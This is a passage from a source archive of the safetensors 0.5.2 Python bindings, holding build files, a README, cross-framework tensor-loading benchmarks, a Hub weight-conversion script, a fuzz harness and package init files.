source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "38a385202ff5a92791168b1136afae5059d3ac118457bb7bc304c197c2d33e7d" dependencies = [ "heck", "proc-macro2", "pyo3-build-config", "quote", "syn", ] [[package]] name = "quote" version = "1.0.38" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "0e4dccaaaf89514f546c693ddc140f729f958c247918a13380cccc6078391acc" dependencies = [ "proc-macro2", ] [[package]] name = "ryu" version = "1.0.18" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "f3cb5ba0dc43242ce17de99c180e96db90b235b8a9fdc9543c96d2209116bd9f" [[package]] name = "safetensors" version = "0.5.2" dependencies = [ "serde", "serde_json", ] [[package]] name = "safetensors-python" version = "0.5.2" dependencies = [ "memmap2", "pyo3", "safetensors", "serde_json", ] [[package]] name = "serde" version = "1.0.217" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "02fc4265df13d6fa1d00ecff087228cc0a2b5f3c0e87e258d8b94a156e984c70" dependencies = [ "serde_derive", ] [[package]] name = "serde_derive" version = "1.0.217" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5a9bf7cf98d04a2b28aead066b7496853d4779c9cc183c440dbac457641e19a0" dependencies = [ "proc-macro2", "quote", "syn", ] [[package]] name = "serde_json" version = "1.0.135" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2b0d7ba2887406110130a978386c4e1befb98c674b4fba677954e4db976630d9" dependencies = [ "itoa", "memchr", "ryu", "serde", ] [[package]] name = "syn" version = "2.0.95" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "46f71c0377baf4ef1cc3e3402ded576dccc315800fbc62dfc7fe04b009773b4a" dependencies = [ "proc-macro2", "quote", "unicode-ident", ] [[package]] name = "target-lexicon" version = "0.12.16" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "61c41af27dd6d1e27b1b16b489db798443478cef1f06a660c96db617ba5de3b1" [[package]] name = "unicode-ident" version = "1.0.14" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "adb9e6ca4f869e1180728b7950e35922a7fc6397f7b641499e8f3ef06e50dc83" [[package]] name = "unindent" version = "0.2.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c7de7d73e1754487cb58364ee906a499937a0dfabd86bcb980fa99ec8c8fa2ce" safetensors-0.5.2/bindings/python/Cargo.toml000066400000000000000000000006131473753372300211360ustar00rootroot00000000000000[package] name = "safetensors-python" version = "0.5.2" edition = "2021" # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html [lib] name = "safetensors_rust" crate-type = ["cdylib"] [dependencies] pyo3 = { version = "0.23", features = ["abi3", "abi3-py38"] } memmap2 = "0.9" serde_json = "1.0" [dependencies.safetensors] path = "../../safetensors" safetensors-0.5.2/bindings/python/MANIFEST.in000066400000000000000000000002761473753372300207510ustar00rootroot00000000000000include Cargo.toml include pyproject.toml include rust-toolchain include ../../LICENSE recursive-include src * recursive-include safetensors-lib * recursive-exclude safetensors-lib/target * safetensors-0.5.2/bindings/python/Makefile000066400000000000000000000021171473753372300206470ustar00rootroot00000000000000.PHONY: deps_table_update modified_only_fixup extra_style_checks quality style fixup fix-copies test test-examples # make sure to test the local checkout in scripts and not the pre-installed one 
(don't use quotes!) export PYTHONPATH = src check_dirs := tests py_src modified_only_fixup: $(eval modified_py_files := $(shell python utils/get_modified_files.py $(check_dirs))) @if test -n "$(modified_py_files)"; then \ echo "Checking/fixing $(modified_py_files)"; \ black --preview $(modified_py_files); \ isort $(modified_py_files); \ flake8 $(modified_py_files); \ else \ echo "No library .py files were modified"; \ fi quality: black --check --preview $(check_dirs) isort --check-only $(check_dirs) flake8 $(check_dirs) # doc-builder style src/transformers docs/source --max_len 119 --check_only --path_to_docs docs/source style: black --preview $(check_dirs) isort $(check_dirs) # Super fast fix and check target that only works on relevant modified files since the branch was made fixup: modified_only_fixup test: python -m pytest -n auto --dist=loadfile -s -v ./tests/ safetensors-0.5.2/bindings/python/README.md000066400000000000000000000015241473753372300204670ustar00rootroot00000000000000## Installation ``` pip install safetensors ``` ## Usage ### Numpy ```python from safetensors.numpy import save_file, load_file import numpy as np tensors = { "a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8) } save_file(tensors, "./model.safetensors") # Now loading loaded = load_file("./model.safetensors") ``` ### Torch ```python from safetensors.torch import save_file, load_file import torch tensors = { "a": torch.zeros((2, 2)), "b": torch.zeros((2, 3), dtype=torch.uint8) } save_file(tensors, "./model.safetensors") # Now loading loaded = load_file("./model.safetensors") ``` ### Developing ``` # inside ./safetensors/bindings/python pip install .[dev] ``` Should be enough to install this library locally. ### Testing ``` # inside ./safetensors/bindings/python pip install .[dev] pytest -sv tests/ ``` safetensors-0.5.2/bindings/python/benches/000077500000000000000000000000001473753372300206155ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/benches/test_flax.py000066400000000000000000000041361473753372300231640ustar00rootroot00000000000000import os import tempfile import jax.numpy as jnp from flax.serialization import msgpack_restore, msgpack_serialize from safetensors.flax import load_file, save_file def create_gpt2(n_layers: int): tensors = {} tensors["wte"] = jnp.zeros((50257, 768)) tensors["wpe"] = jnp.zeros((1024, 768)) for i in range(n_layers): tensors[f"h.{i}.ln_1.weight"] = jnp.zeros((768,)) tensors[f"h.{i}.ln_1.bias"] = jnp.zeros((768,)) tensors[f"h.{i}.attn.bias"] = jnp.zeros((1, 1, 1024, 1024)) tensors[f"h.{i}.attn.c_attn.weight"] = jnp.zeros((768, 2304)) tensors[f"h.{i}.attn.c_attn.bias"] = jnp.zeros((2304)) tensors[f"h.{i}.attn.c_proj.weight"] = jnp.zeros((768, 768)) tensors[f"h.{i}.attn.c_proj.bias"] = jnp.zeros((768)) tensors[f"h.{i}.ln_2.weight"] = jnp.zeros((768)) tensors[f"h.{i}.ln_2.bias"] = jnp.zeros((768)) tensors[f"h.{i}.mlp.c_fc.weight"] = jnp.zeros((768, 3072)) tensors[f"h.{i}.mlp.c_fc.bias"] = jnp.zeros((3072)) tensors[f"h.{i}.mlp.c_proj.weight"] = jnp.zeros((3072, 768)) tensors[f"h.{i}.mlp.c_proj.bias"] = jnp.zeros((768)) tensors["ln_f.weight"] = jnp.zeros((768)) tensors["ln_f.bias"] = jnp.zeros((768)) return tensors def load(filename): with open(filename, "rb") as f: data = f.read() flax_weights = msgpack_restore(data) return flax_weights def test_flax_flax_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: serialized = msgpack_serialize(weights) f.write(serialized) result = benchmark(load, 
f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert jnp.allclose(v, tv) def test_flax_sf_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert jnp.allclose(v, tv) safetensors-0.5.2/bindings/python/benches/test_mlx.py000066400000000000000000000042011473753372300230230ustar00rootroot00000000000000import os import platform import tempfile if platform.system() == "Darwin": import mlx.core as mx from safetensors.mlx import load_file, save_file def create_gpt2(n_layers: int): tensors = {} tensors["wte"] = mx.zeros((50257, 768)) tensors["wpe"] = mx.zeros((1024, 768)) for i in range(n_layers): tensors[f"h.{i}.ln_1.weight"] = mx.zeros((768,)) tensors[f"h.{i}.ln_1.bias"] = mx.zeros((768,)) tensors[f"h.{i}.attn.bias"] = mx.zeros((1, 1, 1024, 1024)) tensors[f"h.{i}.attn.c_attn.weight"] = mx.zeros((768, 2304)) tensors[f"h.{i}.attn.c_attn.bias"] = mx.zeros((2304)) tensors[f"h.{i}.attn.c_proj.weight"] = mx.zeros((768, 768)) tensors[f"h.{i}.attn.c_proj.bias"] = mx.zeros((768)) tensors[f"h.{i}.ln_2.weight"] = mx.zeros((768)) tensors[f"h.{i}.ln_2.bias"] = mx.zeros((768)) tensors[f"h.{i}.mlp.c_fc.weight"] = mx.zeros((768, 3072)) tensors[f"h.{i}.mlp.c_fc.bias"] = mx.zeros((3072)) tensors[f"h.{i}.mlp.c_proj.weight"] = mx.zeros((3072, 768)) tensors[f"h.{i}.mlp.c_proj.bias"] = mx.zeros((768)) tensors["ln_f.weight"] = mx.zeros((768)) tensors["ln_f.bias"] = mx.zeros((768)) return tensors def load(filename): return mx.load(filename) def test_mlx_mlx_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: filename = f"{f.name}.npz" mx.savez(filename, **weights) result = benchmark(load, filename) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert mx.allclose(v, tv) def test_mlx_sf_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert mx.allclose(v, tv) safetensors-0.5.2/bindings/python/benches/test_paddle.py000066400000000000000000000036601473753372300234640ustar00rootroot00000000000000import os import tempfile import numpy as np import paddle from safetensors.paddle import load_file, save_file def create_gpt2(n_layers: int): tensors = {} tensors["wte"] = paddle.zeros((50257, 768)) tensors["wpe"] = paddle.zeros((1024, 768)) for i in range(n_layers): tensors[f"h.{i}.ln_1.weight"] = paddle.zeros((768,)) tensors[f"h.{i}.ln_1.bias"] = paddle.zeros((768,)) tensors[f"h.{i}.attn.bias"] = paddle.zeros((1, 1, 1024, 1024)) tensors[f"h.{i}.attn.c_attn.weight"] = paddle.zeros((768, 2304)) tensors[f"h.{i}.attn.c_attn.bias"] = paddle.zeros((2304,)) tensors[f"h.{i}.attn.c_proj.weight"] = paddle.zeros((768, 768)) tensors[f"h.{i}.attn.c_proj.bias"] = paddle.zeros((768,)) tensors[f"h.{i}.ln_2.weight"] = paddle.zeros((768,)) tensors[f"h.{i}.ln_2.bias"] = paddle.zeros((768,)) tensors[f"h.{i}.mlp.c_fc.weight"] = paddle.zeros((768, 3072)) tensors[f"h.{i}.mlp.c_fc.bias"] = paddle.zeros((3072,)) tensors[f"h.{i}.mlp.c_proj.weight"] = paddle.zeros((3072, 768)) tensors[f"h.{i}.mlp.c_proj.bias"] = paddle.zeros((768,)) tensors["ln_f.weight"] = paddle.zeros((768,)) tensors["ln_f.bias"] = paddle.zeros((768,)) return tensors def 
test_paddle_paddle_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: paddle.save(weights, f.name) result = benchmark(paddle.load, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert paddle.allclose(v, tv) def test_paddle_sf_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert np.allclose(v, tv) safetensors-0.5.2/bindings/python/benches/test_pt.py000066400000000000000000000112341473753372300226520ustar00rootroot00000000000000import os import tempfile import pytest import torch from safetensors.torch import load_file, save_file def create_gpt2(n_layers: int): tensors = {} tensors["wte"] = torch.zeros((50257, 768)) tensors["wpe"] = torch.zeros((1024, 768)) for i in range(n_layers): tensors[f"h.{i}.ln_1.weight"] = torch.zeros((768,)) tensors[f"h.{i}.ln_1.bias"] = torch.zeros((768,)) tensors[f"h.{i}.attn.bias"] = torch.zeros((1, 1, 1024, 1024)) tensors[f"h.{i}.attn.c_attn.weight"] = torch.zeros((768, 2304)) tensors[f"h.{i}.attn.c_attn.bias"] = torch.zeros((2304)) tensors[f"h.{i}.attn.c_proj.weight"] = torch.zeros((768, 768)) tensors[f"h.{i}.attn.c_proj.bias"] = torch.zeros((768)) tensors[f"h.{i}.ln_2.weight"] = torch.zeros((768)) tensors[f"h.{i}.ln_2.bias"] = torch.zeros((768)) tensors[f"h.{i}.mlp.c_fc.weight"] = torch.zeros((768, 3072)) tensors[f"h.{i}.mlp.c_fc.bias"] = torch.zeros((3072)) tensors[f"h.{i}.mlp.c_proj.weight"] = torch.zeros((3072, 768)) tensors[f"h.{i}.mlp.c_proj.bias"] = torch.zeros((768)) tensors["ln_f.weight"] = torch.zeros((768)) tensors["ln_f.bias"] = torch.zeros((768)) return tensors def create_lora(n_layers: int): tensors = {} for i in range(n_layers): tensors[f"lora.{i}.up.weight"] = torch.zeros((32, 32)) tensors[f"lora.{i}.down.weight"] = torch.zeros((32, 32)) return tensors def test_pt_pt_load_cpu(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: torch.save(weights, f) result = benchmark(torch.load, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert torch.allclose(v, tv) def test_pt_sf_load_cpu(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert torch.allclose(v, tv) def test_pt_pt_load_cpu_small(benchmark): weights = create_lora(500) with tempfile.NamedTemporaryFile(delete=False) as f: torch.save(weights, f) result = benchmark(torch.load, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert torch.allclose(v, tv) def test_pt_sf_load_cpu_small(benchmark): weights = create_lora(500) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert torch.allclose(v, tv) @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") def test_pt_pt_load_gpu(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: torch.save(weights, f) result = benchmark(torch.load, f.name, map_location="cuda:0") os.unlink(f.name) for k, v in weights.items(): v = v.cuda() tv = result[k] assert torch.allclose(v, tv) 
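# Note: `benchmark` in these tests is the pytest-benchmark fixture; running this file under pytest (with pytest-benchmark installed) collects the timings, and the CUDA/MPS variants are skipped automatically via the skipif markers when that hardware is unavailable.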
@pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") def test_pt_sf_load_gpu(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name, device="cuda:0") os.unlink(f.name) for k, v in weights.items(): v = v.cuda() tv = result[k] assert torch.allclose(v, tv) @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps") def test_pt_pt_load_mps(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: torch.save(weights, f) result = benchmark(torch.load, f.name, map_location="mps") os.unlink(f.name) for k, v in weights.items(): v = v.to(device="mps") tv = result[k] assert torch.allclose(v, tv) @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps") def test_pt_sf_load_mps(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name, device="mps") os.unlink(f.name) for k, v in weights.items(): v = v.to(device="mps") tv = result[k] assert torch.allclose(v, tv) safetensors-0.5.2/bindings/python/benches/test_tf.py000066400000000000000000000051071473753372300226420ustar00rootroot00000000000000import os import tempfile import h5py import numpy as np import tensorflow as tf from safetensors.tensorflow import load_file, save_file def _load(filename, tensors=None, prefix=""): with h5py.File(filename, "r") as f: if tensors is None: tensors = {} for k in f.keys(): if isinstance(f[k], h5py._hl.dataset.Dataset): key = k if not prefix else f"{prefix}_{k}" tensors[key] = tf.convert_to_tensor(np.array(f[k])) else: tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}")) return tensors def _save(filename, tensors, prefix=""): with h5py.File(filename, "w") as f: for name, tensor in tensors.items(): tensor = tensor.numpy() dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype) dset[:] = tensor def create_gpt2(n_layers: int): tensors = {} tensors["wte"] = tf.zeros((50257, 768)) tensors["wpe"] = tf.zeros((1024, 768)) for i in range(n_layers): tensors[f"h.{i}.ln_1.weight"] = tf.zeros((768,)) tensors[f"h.{i}.ln_1.bias"] = tf.zeros((768,)) tensors[f"h.{i}.attn.bias"] = tf.zeros((1, 1, 1024, 1024)) tensors[f"h.{i}.attn.c_attn.weight"] = tf.zeros((768, 2304)) tensors[f"h.{i}.attn.c_attn.bias"] = tf.zeros((2304)) tensors[f"h.{i}.attn.c_proj.weight"] = tf.zeros((768, 768)) tensors[f"h.{i}.attn.c_proj.bias"] = tf.zeros((768)) tensors[f"h.{i}.ln_2.weight"] = tf.zeros((768)) tensors[f"h.{i}.ln_2.bias"] = tf.zeros((768)) tensors[f"h.{i}.mlp.c_fc.weight"] = tf.zeros((768, 3072)) tensors[f"h.{i}.mlp.c_fc.bias"] = tf.zeros((3072)) tensors[f"h.{i}.mlp.c_proj.weight"] = tf.zeros((3072, 768)) tensors[f"h.{i}.mlp.c_proj.bias"] = tf.zeros((768)) tensors["ln_f.weight"] = tf.zeros((768)) tensors["ln_f.bias"] = tf.zeros((768)) return tensors def test_tf_tf_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: _save(f.name, weights) result = benchmark(_load, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert np.allclose(v, tv) def test_tf_sf_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = 
benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert np.allclose(v, tv) safetensors-0.5.2/bindings/python/convert.py000066400000000000000000000346611473753372300212520ustar00rootroot00000000000000import argparse import json import os import shutil from collections import defaultdict from tempfile import TemporaryDirectory from typing import Dict, List, Optional, Set, Tuple import torch from huggingface_hub import CommitInfo, CommitOperationAdd, Discussion, HfApi, hf_hub_download from huggingface_hub.file_download import repo_folder_name from safetensors.torch import _find_shared_tensors, _is_complete, load_file, save_file COMMIT_DESCRIPTION = """ This is an automated PR created with https://huggingface.co/spaces/safetensors/convert This new file is equivalent to `pytorch_model.bin` but safe in the sense that no arbitrary code can be put into it. These files also happen to load much faster than their pytorch counterpart: https://colab.research.google.com/github/huggingface/notebooks/blob/main/safetensors_doc/en/speed.ipynb The widgets on your model page will run using this model even if this is not merged making sure the file actually works. If you find any issues: please report here: https://huggingface.co/spaces/safetensors/convert/discussions Feel free to ignore this PR. """ ConversionResult = Tuple[List["CommitOperationAdd"], List[Tuple[str, "Exception"]]] def _remove_duplicate_names( state_dict: Dict[str, torch.Tensor], *, preferred_names: List[str] = None, discard_names: List[str] = None, ) -> Dict[str, List[str]]: if preferred_names is None: preferred_names = [] preferred_names = set(preferred_names) if discard_names is None: discard_names = [] discard_names = set(discard_names) shareds = _find_shared_tensors(state_dict) to_remove = defaultdict(list) for shared in shareds: complete_names = set([name for name in shared if _is_complete(state_dict[name])]) if not complete_names: if len(shared) == 1: # Force contiguous name = list(shared)[0] state_dict[name] = state_dict[name].clone() complete_names = {name} else: raise RuntimeError( f"Error while trying to find names to remove to save state dict, but found no suitable name to keep for saving amongst: {shared}. None is covering the entire storage.Refusing to save/load the model since you could be storing much more memory than needed. Please refer to https://huggingface.co/docs/safetensors/torch_shared_tensors for more information. Or open an issue." ) keep_name = sorted(list(complete_names))[0] # Mecanism to preferentially select keys to keep # coming from the on-disk file to allow # loading models saved with a different choice # of keep_name preferred = complete_names.difference(discard_names) if preferred: keep_name = sorted(list(preferred))[0] if preferred_names: preferred = preferred_names.intersection(complete_names) if preferred: keep_name = sorted(list(preferred))[0] for name in sorted(shared): if name != keep_name: to_remove[keep_name].append(name) return to_remove def get_discard_names(model_id: str, revision: Optional[str], folder: str, token: Optional[str]) -> List[str]: try: import json import transformers config_filename = hf_hub_download( model_id, revision=revision, filename="config.json", token=token, cache_dir=folder ) with open(config_filename, "r") as f: config = json.load(f) architecture = config["architectures"][0] class_ = getattr(transformers, architecture) # Name for this varible depends on transformers version. 
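# `_tied_weights_keys` lists parameter names whose storage is tied to another tensor (e.g. tied input/output embeddings); those names can safely be dropped during conversion, since safetensors refuses to serialize tensors that share storage.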
discard_names = getattr(class_, "_tied_weights_keys", []) except Exception: discard_names = [] return discard_names class AlreadyExists(Exception): pass def check_file_size(sf_filename: str, pt_filename: str): sf_size = os.stat(sf_filename).st_size pt_size = os.stat(pt_filename).st_size if (sf_size - pt_size) / pt_size > 0.01: raise RuntimeError( f"""The file size different is more than 1%: - {sf_filename}: {sf_size} - {pt_filename}: {pt_size} """ ) def rename(pt_filename: str) -> str: filename, ext = os.path.splitext(pt_filename) local = f"{filename}.safetensors" local = local.replace("pytorch_model", "model") return local def convert_multi( model_id: str, *, revision=Optional[str], folder: str, token: Optional[str], discard_names: List[str] ) -> ConversionResult: filename = hf_hub_download( repo_id=model_id, revision=revision, filename="pytorch_model.bin.index.json", token=token, cache_dir=folder ) with open(filename, "r") as f: data = json.load(f) filenames = set(data["weight_map"].values()) local_filenames = [] for filename in filenames: pt_filename = hf_hub_download(repo_id=model_id, filename=filename, token=token, cache_dir=folder) sf_filename = rename(pt_filename) sf_filename = os.path.join(folder, sf_filename) convert_file(pt_filename, sf_filename, discard_names=discard_names) local_filenames.append(sf_filename) index = os.path.join(folder, "model.safetensors.index.json") with open(index, "w") as f: newdata = {k: v for k, v in data.items()} newmap = {k: rename(v) for k, v in data["weight_map"].items()} newdata["weight_map"] = newmap json.dump(newdata, f, indent=4) local_filenames.append(index) operations = [ CommitOperationAdd(path_in_repo=os.path.basename(local), path_or_fileobj=local) for local in local_filenames ] errors: List[Tuple[str, "Exception"]] = [] return operations, errors def convert_single( model_id: str, *, revision: Optional[str], folder: str, token: Optional[str], discard_names: List[str] ) -> ConversionResult: pt_filename = hf_hub_download( repo_id=model_id, revision=revision, filename="pytorch_model.bin", token=token, cache_dir=folder ) sf_name = "model.safetensors" sf_filename = os.path.join(folder, sf_name) convert_file(pt_filename, sf_filename, discard_names) operations = [CommitOperationAdd(path_in_repo=sf_name, path_or_fileobj=sf_filename)] errors: List[Tuple[str, "Exception"]] = [] return operations, errors def convert_file( pt_filename: str, sf_filename: str, discard_names: List[str], ): loaded = torch.load(pt_filename, map_location="cpu") if "state_dict" in loaded: loaded = loaded["state_dict"] to_removes = _remove_duplicate_names(loaded, discard_names=discard_names) metadata = {"format": "pt"} for kept_name, to_remove_group in to_removes.items(): for to_remove in to_remove_group: if to_remove not in metadata: metadata[to_remove] = kept_name del loaded[to_remove] # Force tensors to be contiguous loaded = {k: v.contiguous() for k, v in loaded.items()} dirname = os.path.dirname(sf_filename) os.makedirs(dirname, exist_ok=True) save_file(loaded, sf_filename, metadata=metadata) check_file_size(sf_filename, pt_filename) reloaded = load_file(sf_filename) for k in loaded: pt_tensor = loaded[k] sf_tensor = reloaded[k] if not torch.equal(pt_tensor, sf_tensor): raise RuntimeError(f"The output tensors do not match for key {k}") def create_diff(pt_infos: Dict[str, List[str]], sf_infos: Dict[str, List[str]]) -> str: errors = [] for key in ["missing_keys", "mismatched_keys", "unexpected_keys"]: pt_set = set(pt_infos[key]) sf_set = set(sf_infos[key]) pt_only = pt_set - 
sf_set sf_only = sf_set - pt_set if pt_only: errors.append(f"{key} : PT warnings contain {pt_only} which are not present in SF warnings") if sf_only: errors.append(f"{key} : SF warnings contain {sf_only} which are not present in PT warnings") return "\n".join(errors) def previous_pr(api: "HfApi", model_id: str, pr_title: str, revision=Optional[str]) -> Optional["Discussion"]: try: revision_commit = api.model_info(model_id, revision=revision).sha discussions = api.get_repo_discussions(repo_id=model_id) except Exception: return None for discussion in discussions: if discussion.status in {"open", "closed"} and discussion.is_pull_request and discussion.title == pr_title: commits = api.list_repo_commits(model_id, revision=discussion.git_reference) if revision_commit == commits[1].commit_id: return discussion return None def convert_generic( model_id: str, *, revision=Optional[str], folder: str, filenames: Set[str], token: Optional[str] ) -> ConversionResult: operations = [] errors = [] extensions = set([".bin", ".ckpt"]) for filename in filenames: prefix, ext = os.path.splitext(filename) if ext in extensions: pt_filename = hf_hub_download( model_id, revision=revision, filename=filename, token=token, cache_dir=folder ) dirname, raw_filename = os.path.split(filename) if raw_filename == "pytorch_model.bin": # XXX: This is a special case to handle `transformers` and the # `transformers` part of the model which is actually loaded by `transformers`. sf_in_repo = os.path.join(dirname, "model.safetensors") else: sf_in_repo = f"{prefix}.safetensors" sf_filename = os.path.join(folder, sf_in_repo) try: convert_file(pt_filename, sf_filename, discard_names=[]) operations.append(CommitOperationAdd(path_in_repo=sf_in_repo, path_or_fileobj=sf_filename)) except Exception as e: errors.append((pt_filename, e)) return operations, errors def convert( api: "HfApi", model_id: str, revision: Optional[str] = None, force: bool = False ) -> Tuple["CommitInfo", List[Tuple[str, "Exception"]]]: pr_title = "Adding `safetensors` variant of this model" info = api.model_info(model_id, revision=revision) filenames = set(s.rfilename for s in info.siblings) with TemporaryDirectory() as d: folder = os.path.join(d, repo_folder_name(repo_id=model_id, repo_type="models")) os.makedirs(folder) new_pr = None try: operations = None pr = previous_pr(api, model_id, pr_title, revision=revision) library_name = getattr(info, "library_name", None) if any(filename.endswith(".safetensors") for filename in filenames) and not force: raise AlreadyExists(f"Model {model_id} is already converted, skipping..") elif pr is not None and not force: url = f"https://huggingface.co/{model_id}/discussions/{pr.num}" new_pr = pr raise AlreadyExists(f"Model {model_id} already has an open PR check out {url}") elif library_name == "transformers": discard_names = get_discard_names(model_id, revision=revision, folder=folder, token=api.token) if "pytorch_model.bin" in filenames: operations, errors = convert_single( model_id, revision=revision, folder=folder, token=api.token, discard_names=discard_names ) elif "pytorch_model.bin.index.json" in filenames: operations, errors = convert_multi( model_id, revision=revision, folder=folder, token=api.token, discard_names=discard_names ) else: raise RuntimeError(f"Model {model_id} doesn't seem to be a valid pytorch model. 
Cannot convert") else: operations, errors = convert_generic( model_id, revision=revision, folder=folder, filenames=filenames, token=api.token ) if operations: new_pr = api.create_commit( repo_id=model_id, revision=revision, operations=operations, commit_message=pr_title, commit_description=COMMIT_DESCRIPTION, create_pr=True, ) print(f"Pr created at {new_pr.pr_url}") else: print("No files to convert") finally: shutil.rmtree(folder) return new_pr, errors if __name__ == "__main__": DESCRIPTION = """ Simple utility tool to convert automatically some weights on the hub to `safetensors` format. It is PyTorch exclusive for now. It works by downloading the weights (PT), converting them locally, and uploading them back as a PR on the hub. """ parser = argparse.ArgumentParser(description=DESCRIPTION) parser.add_argument( "model_id", type=str, help="The name of the model on the hub to convert. E.g. `gpt2` or `facebook/wav2vec2-base-960h`", ) parser.add_argument( "--revision", type=str, help="The revision to convert", ) parser.add_argument( "--force", action="store_true", help="Create the PR even if it already exists of if the model was already converted.", ) parser.add_argument( "-y", action="store_true", help="Ignore safety prompt", ) args = parser.parse_args() model_id = args.model_id api = HfApi() if args.y: txt = "y" else: txt = input( "This conversion script will unpickle a pickled file, which is inherently unsafe. If you do not trust this file, we invite you to use" " https://huggingface.co/spaces/safetensors/convert or google colab or other hosted solution to avoid potential issues with this file." " Continue [Y/n] ?" ) if txt.lower() in {"", "y"}: commit_info, errors = convert(api, model_id, revision=args.revision, force=args.force) string = f""" ### Success 🔥 Yay! 
This model was successfully converted and a PR was open using your token, here: [{commit_info.pr_url}]({commit_info.pr_url}) """ if errors: string += "\nErrors during conversion:\n" string += "\n".join( f"Error while converting {filename}: {e}, skipped conversion" for filename, e in errors ) print(string) else: print(f"Answer was `{txt}` aborting.") safetensors-0.5.2/bindings/python/convert_all.py000066400000000000000000000026561473753372300221010ustar00rootroot00000000000000"""Simple utility tool to convert automatically most downloaded models""" from convert import AlreadyExists, convert from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments from transformers import AutoConfig if __name__ == "__main__": api = HfApi() args = ModelSearchArguments() total = 50 models = list( api.list_models(filter=ModelFilter(library=args.library.Transformers), sort="downloads", direction=-1) )[:total] correct = 0 errors = set() for model in models: model = api.model_info(model.id, files_metadata=True) size = None for sibling in model.siblings: if sibling.rfilename == "pytorch_model.bin": size = sibling.size if size is None or size > 2_000_000_000: print(f"[{model.downloads}] Skipping {model.modelId} (too large {size})") continue model_id = model.modelId print(f"[{model.downloads}] {model.modelId}") try: convert(api, model_id) correct += 1 except AlreadyExists as e: correct += 1 print(e) except Exception as e: config = AutoConfig.from_pretrained(model_id) errors.add(config.__class__.__name__) print(e) print(f"Errors: {errors}") print(f"File size is difference {len(errors)}") print(f"Correct rate {correct}/{total} ({correct/total * 100:.2f}%)") safetensors-0.5.2/bindings/python/fuzz.py000066400000000000000000000013311473753372300205540ustar00rootroot00000000000000import datetime import sys import tempfile from collections import defaultdict import atheris with atheris.instrument_imports(): from safetensors.torch import load_file EXCEPTIONS = defaultdict(int) START = datetime.datetime.now() DT = datetime.timedelta(seconds=30) def TestOneInput(data): global START with tempfile.NamedTemporaryFile() as f: f.write(data) f.seek(0) try: load_file(f.name, device=0) except Exception as e: EXCEPTIONS[str(e)] += 1 if datetime.datetime.now() - START > DT: for e, n in EXCEPTIONS.items(): print(e, n) START = datetime.datetime.now() atheris.Setup(sys.argv, TestOneInput) atheris.Fuzz() safetensors-0.5.2/bindings/python/py_src/000077500000000000000000000000001473753372300205055ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/py_src/safetensors/000077500000000000000000000000001473753372300230415ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/py_src/safetensors/__init__.py000066400000000000000000000002531473753372300251520ustar00rootroot00000000000000# Re-export this from ._safetensors_rust import ( # noqa: F401 SafetensorError, __version__, deserialize, safe_open, serialize, serialize_file, ) safetensors-0.5.2/bindings/python/py_src/safetensors/__init__.pyi000066400000000000000000000072541473753372300253330ustar00rootroot00000000000000# Generated content DO NOT EDIT @staticmethod def deserialize(bytes): """ Opens a safetensors lazily and returns 